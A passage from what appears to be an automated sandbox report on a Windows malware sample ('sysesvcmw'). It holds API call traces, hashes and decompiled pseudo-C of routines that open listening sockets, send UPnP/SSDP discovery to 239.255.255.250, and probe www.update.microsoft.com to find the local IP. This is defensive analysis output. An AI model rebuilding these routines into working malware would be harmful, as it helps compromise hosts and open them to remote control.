                                                                                                                                                                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EB8B
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 0040EBB1
                                                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 0040EBE1
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,00000004,00000010), ref: 0040EBF7
                                                                                                                                                                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040EC0F
                                                                                                                                                                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040EC1A
                                                                                                                                                                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EC2E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BBC4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040BC1F
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040BC5C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040BC67
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: DuplicateHandle.KERNEL32 ref: 0040BC6E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040BC82
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 35c833f7b889afcd1c855e48f5f4dfb3cfebec0e696530983b6abda77ec0d31a
                                                                                                                                                                                                                                                                                    • Instruction ID: 55e3d3791406c7558891e3ce563330e9b7b343d865a5bfb51454dd4e2dcce5d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35c833f7b889afcd1c855e48f5f4dfb3cfebec0e696530983b6abda77ec0d31a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65419270644302BBE3209F758C4AF46B7A5BF44710F108A2AF568E62D0E7B5E454CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 311 40c580-40c5a7 socket 312 40c6e1-40c6e5 311->312 313 40c5ad-40c675 htons inet_addr setsockopt call 409540 bind lstrlenA sendto ioctlsocket 311->313 314 40c6e7-40c6ed 312->314 315 40c6ef-40c6f5 312->315 318 40c67b-40c682 313->318 314->315 319 40c684-40c693 call 40c490 318->319 320 40c6d5-40c6d9 call 409600 318->320 324 40c698-40c6a0 319->324 323 40c6de 320->323 323->312 325 40c6a2 324->325 326 40c6a4-40c6d3 call 408b60 324->326 325->320 326->318
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040C59A
                                                                                                                                                                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040C5D0
                                                                                                                                                                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040C5DF
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C5FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: htons.WS2_32(00000050), ref: 0040956D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: socket.WS2_32(00000002,00000001,00000000), ref: 0040958D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: connect.WS2_32(000000FF,?,00000010), ref: 004095A6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: getsockname.WS2_32(000000FF,?,00000010), ref: 004095D8
                                                                                                                                                                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040C633
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00410578,00000000,?,00000010), ref: 0040C64C
                                                                                                                                                                                                                                                                                    • sendto.WS2_32(000000FF,00410578,00000000), ref: 0040C65B
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C675
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C4DE
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: Sleep.KERNEL32(000003E8), ref: 0040C4EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C50B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C521
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrChrA.SHLWAPI(?,0000000D), ref: 0040C54E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                                                    • String ID: 239.255.255.250
                                                                                                                                                                                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                                                    • Opcode ID: bc372376455bd7999416a1e07122edefff59cd2e974b536031894a41811314e4
                                                                                                                                                                                                                                                                                    • Instruction ID: 76d768ee63a1ab765bf53bd3b80837b0909e15b9bb20e5c949896882321ca4fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc372376455bd7999416a1e07122edefff59cd2e974b536031894a41811314e4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C4106B4E00208EBDB14DFE4D889BEEBBB5AF48304F108569E505B7290E7B55A44CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                                                                                                                                                    			E0040D8A0(intOrPtr __edi, void* __esi) {
                                                                                                                                                                                                                                                                                    				short _v8;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v24;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				char _v33;
                                                                                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    				short _t24;
                                                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t39 = __esi;
                                                                                                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                                                                                                    				if(__esi == 0 || __edi == 0) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t31 = E00408B00(0x24);
                                                                                                                                                                                                                                                                                    					 *_t31 = 0x756470;
                                                                                                                                                                                                                                                                                    					 *(_t31 + 4) = 0;
                                                                                                                                                                                                                                                                                    					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t31 + 0x10) = _t21;
                                                                                                                                                                                                                                                                                    					__imp__#23(2, 2, 0x11, _t30); // executed
                                                                                                                                                                                                                                                                                    					 *(_t31 + 8) = _t21;
                                                                                                                                                                                                                                                                                    					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						E0040DD00(_t31, __edi);
                                                                                                                                                                                                                                                                                    						_t31 = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                                    						return _t31;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v26 = 0;
                                                                                                                                                                                                                                                                                    					_v22 = 0;
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_t24 = _v8;
                                                                                                                                                                                                                                                                                    					_v24 = _t24;
                                                                                                                                                                                                                                                                                    					_v28 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#9(_t39);
                                                                                                                                                                                                                                                                                    					_v30 = _t24;
                                                                                                                                                                                                                                                                                    					_v33 = 1;
                                                                                                                                                                                                                                                                                    					_t25 =  *(_t31 + 8);
                                                                                                                                                                                                                                                                                    					__imp__#21(_t25, 0xffff, 4,  &_v33, 1); // executed
                                                                                                                                                                                                                                                                                    					__imp__#2( *(_t31 + 8),  &_v52, 0x10); // executed
                                                                                                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                                                                                                                                                                                                                    						_t26 = CreateThread(0, 0, E0040DAD0, _t31, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						 *(_t31 + 0x14) = _t26;
                                                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040DD00(_t31, _t38);
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x0040d8a0
                                                                                                                                                                                                                                                                                    0x0040d8a0
                                                                                                                                                                                                                                                                                    0x0040d8a8
                                                                                                                                                                                                                                                                                    0x0040d994
                                                                                                                                                                                                                                                                                    0x0040d8b6
                                                                                                                                                                                                                                                                                    0x0040d8c5
                                                                                                                                                                                                                                                                                    0x0040d8cb
                                                                                                                                                                                                                                                                                    0x0040d8d1
                                                                                                                                                                                                                                                                                    0x0040d8d8
                                                                                                                                                                                                                                                                                    0x0040d8e4
                                                                                                                                                                                                                                                                                    0x0040d8e7
                                                                                                                                                                                                                                                                                    0x0040d8ed
                                                                                                                                                                                                                                                                                    0x0040d8f3
                                                                                                                                                                                                                                                                                    0x0040d8f5
                                                                                                                                                                                                                                                                                    0x0040d8fa
                                                                                                                                                                                                                                                                                    0x0040d8fa
                                                                                                                                                                                                                                                                                    0x0040d8fe
                                                                                                                                                                                                                                                                                    0x0040d98e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d990
                                                                                                                                                                                                                                                                                    0x0040d906
                                                                                                                                                                                                                                                                                    0x0040d90a
                                                                                                                                                                                                                                                                                    0x0040d90e
                                                                                                                                                                                                                                                                                    0x0040d912
                                                                                                                                                                                                                                                                                    0x0040d917
                                                                                                                                                                                                                                                                                    0x0040d921
                                                                                                                                                                                                                                                                                    0x0040d925
                                                                                                                                                                                                                                                                                    0x0040d92a
                                                                                                                                                                                                                                                                                    0x0040d939
                                                                                                                                                                                                                                                                                    0x0040d93e
                                                                                                                                                                                                                                                                                    0x0040d943
                                                                                                                                                                                                                                                                                    0x0040d94c
                                                                                                                                                                                                                                                                                    0x0040d95d
                                                                                                                                                                                                                                                                                    0x0040d966
                                                                                                                                                                                                                                                                                    0x0040d982
                                                                                                                                                                                                                                                                                    0x0040d985
                                                                                                                                                                                                                                                                                    0x0040d98b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d98b
                                                                                                                                                                                                                                                                                    0x0040d968
                                                                                                                                                                                                                                                                                    0x0040d973
                                                                                                                                                                                                                                                                                    0x0040d973

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040D8D8
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D8E7
                                                                                                                                                                                                                                                                                    • htons.WS2_32(00009E34), ref: 0040D92A
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040D94C
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,00000004,00000010), ref: 0040D95D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000DAD0,00000000,00000000,00000000), ref: 0040D985
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2d911b1bbcf8aa9228971664239ddae190cfab587872b89484cf3d1e1edbad1a
                                                                                                                                                                                                                                                                                    • Instruction ID: 030b81ab5cfdece744e4193ec97e607ba68bdf4ca273294f478105adee985cb3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d911b1bbcf8aa9228971664239ddae190cfab587872b89484cf3d1e1edbad1a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A721A1B4A44301AFE710DFA48C8AB577AA0EF44710F50857AFA54DA2C1D7F4C9488B6A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E0040B540(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = _a16;
                                                                                                                                                                                                                                                                                    				if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v12 = GetTickCount() + _v12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = _a8;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					_t38 = _a4;
                                                                                                                                                                                                                                                                                    					__imp__#10(_t38, 0x4004667f,  &_v16); // executed
                                                                                                                                                                                                                                                                                    					if(_t38 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v16 > 0) {
                                                                                                                                                                                                                                                                                    						if(_v16 >= _a12) {
                                                                                                                                                                                                                                                                                    							_v24 = _a12;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = _v16;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t43 = _a4;
                                                                                                                                                                                                                                                                                    						__imp__#16(_t43, _v8, _v24, 0); // executed
                                                                                                                                                                                                                                                                                    						_v20 = _t43;
                                                                                                                                                                                                                                                                                    						if(_v20 > 0) {
                                                                                                                                                                                                                                                                                    							if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_v12 = GetTickCount() + _a16;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_a12 = _a12 - _v20;
                                                                                                                                                                                                                                                                                    							_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(1); // executed
                                                                                                                                                                                                                                                                                    					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						return 0 | _a12 == 0x00000000;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L15;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x0040b549
                                                                                                                                                                                                                                                                                    0x0040b550
                                                                                                                                                                                                                                                                                    0x0040b55b
                                                                                                                                                                                                                                                                                    0x0040b55b
                                                                                                                                                                                                                                                                                    0x0040b561
                                                                                                                                                                                                                                                                                    0x0040b564
                                                                                                                                                                                                                                                                                    0x0040b564
                                                                                                                                                                                                                                                                                    0x0040b574
                                                                                                                                                                                                                                                                                    0x0040b578
                                                                                                                                                                                                                                                                                    0x0040b581
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b589
                                                                                                                                                                                                                                                                                    0x0040b591
                                                                                                                                                                                                                                                                                    0x0040b59e
                                                                                                                                                                                                                                                                                    0x0040b593
                                                                                                                                                                                                                                                                                    0x0040b596
                                                                                                                                                                                                                                                                                    0x0040b596
                                                                                                                                                                                                                                                                                    0x0040b5ab
                                                                                                                                                                                                                                                                                    0x0040b5af
                                                                                                                                                                                                                                                                                    0x0040b5b5
                                                                                                                                                                                                                                                                                    0x0040b5bc
                                                                                                                                                                                                                                                                                    0x0040b5c2
                                                                                                                                                                                                                                                                                    0x0040b5cd
                                                                                                                                                                                                                                                                                    0x0040b5cd
                                                                                                                                                                                                                                                                                    0x0040b5d6
                                                                                                                                                                                                                                                                                    0x0040b5df
                                                                                                                                                                                                                                                                                    0x0040b5df
                                                                                                                                                                                                                                                                                    0x0040b5bc
                                                                                                                                                                                                                                                                                    0x0040b5e4
                                                                                                                                                                                                                                                                                    0x0040b5f3
                                                                                                                                                                                                                                                                                    0x0040b5ff
                                                                                                                                                                                                                                                                                    0x0040b60b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b5f3
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B552
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B578
                                                                                                                                                                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B5AF
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B5C4
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040B5E4
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B5EA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3dbc88ac5e59e45bbdcf572904d8cc1d56ccf512b654b7b3376d83b26deadee6
                                                                                                                                                                                                                                                                                    • Instruction ID: 64461f39ab81653a4184227da93eab0719a9ebb5afb4910718686698f9d98f64
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dbc88ac5e59e45bbdcf572904d8cc1d56ccf512b654b7b3376d83b26deadee6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7131EF74900209EFCB14DFA4DD48AEE7BB5FF48315F1086AAE825A3290D7749A50CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                                                                                                                                                    			E00409540() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				short _v10;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				short _v34;
                                                                                                                                                                                                                                                                                    				short _v38;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				short _v42;
                                                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v22 = 0;
                                                                                                                                                                                                                                                                                    				_v18 = 0;
                                                                                                                                                                                                                                                                                    				_v14 = 0;
                                                                                                                                                                                                                                                                                    				_v10 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 2;
                                                                                                                                                                                                                                                                                    				__imp__#9(0x50);
                                                                                                                                                                                                                                                                                    				_v22 = 0;
                                                                                                                                                                                                                                                                                    				_t28 = E00409500("www.update.microsoft.com"); // executed
                                                                                                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                                                                                                    				__imp__#23(2, 1, 0); // executed
                                                                                                                                                                                                                                                                                    				_v28 = _t28;
                                                                                                                                                                                                                                                                                    				if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_t30 =  &_v24;
                                                                                                                                                                                                                                                                                    					__imp__#4(_v28, _t30, 0x10); // executed
                                                                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                                                                    						_v44 = 0;
                                                                                                                                                                                                                                                                                    						_v42 = 0;
                                                                                                                                                                                                                                                                                    						_v38 = 0;
                                                                                                                                                                                                                                                                                    						_v34 = 0;
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v48 = 0x10;
                                                                                                                                                                                                                                                                                    						__imp__#6(_v28,  &_v44,  &_v48); // executed
                                                                                                                                                                                                                                                                                    						_v8 = _v40;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00409600(_v28); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                                                    0x00409546
                                                                                                                                                                                                                                                                                    0x0040954f
                                                                                                                                                                                                                                                                                    0x00409555
                                                                                                                                                                                                                                                                                    0x00409558
                                                                                                                                                                                                                                                                                    0x0040955b
                                                                                                                                                                                                                                                                                    0x0040955e
                                                                                                                                                                                                                                                                                    0x00409567
                                                                                                                                                                                                                                                                                    0x0040956d
                                                                                                                                                                                                                                                                                    0x00409573
                                                                                                                                                                                                                                                                                    0x0040957c
                                                                                                                                                                                                                                                                                    0x00409584
                                                                                                                                                                                                                                                                                    0x0040958d
                                                                                                                                                                                                                                                                                    0x00409593
                                                                                                                                                                                                                                                                                    0x0040959a
                                                                                                                                                                                                                                                                                    0x0040959e
                                                                                                                                                                                                                                                                                    0x004095a6
                                                                                                                                                                                                                                                                                    0x004095ae
                                                                                                                                                                                                                                                                                    0x004095b2
                                                                                                                                                                                                                                                                                    0x004095b8
                                                                                                                                                                                                                                                                                    0x004095bb
                                                                                                                                                                                                                                                                                    0x004095be
                                                                                                                                                                                                                                                                                    0x004095c1
                                                                                                                                                                                                                                                                                    0x004095c5
                                                                                                                                                                                                                                                                                    0x004095d8
                                                                                                                                                                                                                                                                                    0x004095e1
                                                                                                                                                                                                                                                                                    0x004095e1
                                                                                                                                                                                                                                                                                    0x004095e8
                                                                                                                                                                                                                                                                                    0x004095ed
                                                                                                                                                                                                                                                                                    0x004095f6

                                                                                                                                                                                                                                                                                    APIs
